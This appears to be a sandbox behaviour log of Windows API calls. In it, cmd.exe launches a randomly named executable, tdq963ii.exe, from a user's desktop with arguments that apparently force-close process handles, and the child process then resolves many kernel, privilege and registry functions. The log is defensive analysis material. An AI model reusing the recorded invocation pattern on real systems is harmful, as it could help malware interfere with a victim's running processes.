GetProcessHeap () returned 0x690000 [0248.611] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x78) returned 0x6a8f58 [0248.611] GetProcessHeap () returned 0x690000 [0248.611] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4f28 | out: hHeap=0x690000) returned 1 [0248.611] GetConsoleOutputCP () returned 0x1b5 [0248.611] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0248.611] GetUserDefaultLCID () returned 0x409 [0248.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0248.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f880, cchData=128 | out: lpLCData="0") returned 2 [0248.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f880, cchData=128 | out: lpLCData="0") returned 2 [0248.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f880, cchData=128 | out: lpLCData="1") returned 2 [0248.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0248.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0248.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0248.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0248.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0248.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0248.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0248.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0248.613] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0248.613] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0248.613] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0248.615] GetProcessHeap () returned 0x690000 [0248.615] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20c) returned 0x6a2200 [0248.615] GetConsoleTitleW (in: lpConsoleTitle=0x6a2200, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0248.757] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0248.758] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0248.758] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0248.758] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0248.760] GetProcessHeap () returned 0x690000 [0248.760] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x400a) returned 0x6a4f28 [0248.760] GetProcessHeap () returned 0x690000 [0248.760] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4f28 | out: hHeap=0x690000) returned 1 [0248.761] _wcsicmp (_String1="tdq963ii.exe", _String2=")") returned 75 [0248.761] _wcsicmp (_String1="FOR", _String2="tdq963ii.exe") returned -14 [0248.761] _wcsicmp (_String1="FOR/?", _String2="tdq963ii.exe") returned -14 [0248.761] _wcsicmp (_String1="IF", _String2="tdq963ii.exe") returned -11 [0248.761] _wcsicmp (_String1="IF/?", _String2="tdq963ii.exe") returned -11 [0248.761] _wcsicmp (_String1="REM", _String2="tdq963ii.exe") returned -2 [0248.761] _wcsicmp (_String1="REM/?", _String2="tdq963ii.exe") returned -2 [0248.761] GetProcessHeap () returned 0x690000 [0248.761] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x58) returned 0x6a46c8 [0248.761] GetProcessHeap () returned 0x690000 [0248.762] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x22) returned 0x6a2418 [0248.763] GetProcessHeap () returned 0x690000 [0248.763] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x5c) returned 0x6a2448 [0248.764] GetConsoleTitleW (in: lpConsoleTitle=0x16f578, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0248.765] GetFileAttributesW (lpFileName="tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x20 [0248.765] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0248.765] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0248.765] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0248.765] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0248.765] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0248.766] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0248.767] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="FOR") returned 14 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="IF") returned 11 [0248.768] _wcsicmp (_String1="tdq963ii.exe", _String2="REM") returned 2 [0248.769] GetProcessHeap () returned 0x690000 [0248.769] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x210) returned 0x6a24b0 [0248.769] GetProcessHeap () returned 0x690000 [0248.769] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x76) returned 0x6a8fd8 [0248.769] _wcsnicmp (_String1="tdq9", _String2="cmd ", _MaxCount=0x4) returned 17 [0248.770] GetProcessHeap () returned 0x690000 [0248.770] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x418) returned 0x6a26c8 [0248.770] SetErrorMode (uMode=0x0) returned 0x0 [0248.770] SetErrorMode (uMode=0x1) returned 0x0 [0248.770] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6a26d0, lpFilePart=0x16f098 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x16f098*="Desktop") returned 0x25 [0248.770] SetErrorMode (uMode=0x0) returned 0x1 [0248.770] GetProcessHeap () returned 0x690000 [0248.770] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x6a26c8, Size=0x6e) returned 0x6a26c8 [0248.770] GetProcessHeap () returned 0x690000 [0248.770] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x6a26c8) returned 0x6e [0248.770] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0248.770] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0248.770] GetProcessHeap () returned 0x690000 [0248.770] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x120) returned 0x6a2740 [0248.771] GetProcessHeap () returned 0x690000 [0248.771] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x238) returned 0x6a2868 [0248.780] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0248.780] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x16ee34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ee34) returned 0x6a2a18 [0248.781] GetProcessHeap () returned 0x690000 [0248.781] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x14) returned 0x6a2a58 [0248.781] FindClose (in: hFindFile=0x6a2a18 | out: hFindFile=0x6a2a18) returned 1 [0248.781] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0248.781] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0248.781] GetConsoleTitleW (in: lpConsoleTitle=0x16f30c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0248.781] InitializeProcThreadAttributeList (in: lpAttributeList=0x16f194, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16f25c | out: lpAttributeList=0x16f194, lpSize=0x16f25c) returned 1 [0248.781] UpdateProcThreadAttribute (in: lpAttributeList=0x16f194, dwFlags=0x0, Attribute=0x60001, lpValue=0x16f254, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16f194, lpPreviousValue=0x0) returned 1 [0248.781] GetStartupInfoW (in: lpStartupInfo=0x16f150 | out: lpStartupInfo=0x16f150*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x80, hStdError=0xb)) [0248.781] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0248.782] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula \"MSPVWCTL.DLL.mui\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x16f1f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"MSPVWCTL.DLL.mui\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16f23c | out: lpCommandLine="tdq963ii.exe -accepteula \"MSPVWCTL.DLL.mui\" -nobanner", lpProcessInformation=0x16f23c*(hProcess=0x78, hThread=0x74, dwProcessId=0xad4, dwThreadId=0xaf4)) returned 1 [0248.799] CloseHandle (hObject=0x74) returned 1 [0248.799] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0248.799] GetProcessHeap () returned 0x690000 [0248.800] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2d90 | out: hHeap=0x690000) returned 1 [0248.800] GetEnvironmentStringsW () returned 0x6a2cb8* [0248.800] GetProcessHeap () returned 0x690000 [0248.800] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xb88) returned 0x6aaf40 [0248.800] FreeEnvironmentStringsW (penv=0x6a2cb8) returned 1 [0248.800] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) Process: id = "280" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x165db000" os_pid = "0x78c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "194" os_parent_pid = "0x494" cmd_line = "tdq963ii.exe -accepteula -c -y -p handles -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 902 os_tid = 0x30c [0249.022] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0249.022] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0249.022] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0249.023] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0249.023] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0249.023] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0249.023] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0249.023] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0249.023] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0249.023] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0249.023] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0249.023] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0249.023] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0249.023] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0249.024] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0249.024] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0249.024] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0249.024] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0249.024] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0249.024] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0249.024] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0249.024] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0249.024] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0249.024] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0249.024] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0249.024] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0249.024] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0249.025] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0249.025] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0249.025] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0249.025] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0249.025] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0249.025] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0249.025] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0249.025] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0249.025] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0249.025] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0249.025] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0249.025] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0249.026] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0249.026] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0249.026] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0249.026] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0249.026] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0249.026] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0249.026] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0249.026] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0249.026] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0249.026] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0249.026] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0249.026] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0249.026] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0249.027] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0249.027] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0249.027] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0249.027] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0249.027] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0249.027] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0249.027] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0249.027] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0249.027] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0249.027] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0249.027] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0249.027] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0249.027] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0249.028] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0249.028] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0249.028] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0249.028] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0249.028] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0249.028] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0249.028] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0249.028] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0249.028] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0249.028] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0249.028] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0249.028] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0249.029] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0249.029] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0249.029] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0249.029] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0249.029] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0249.029] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0249.029] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0249.029] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0249.029] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0249.029] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0249.029] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0249.029] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0249.029] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0249.029] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0249.030] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0249.030] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0249.030] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0249.030] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0249.030] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0249.030] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0249.030] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0249.030] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0249.030] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0249.030] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0249.030] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0249.031] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0249.031] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0249.031] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0249.031] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 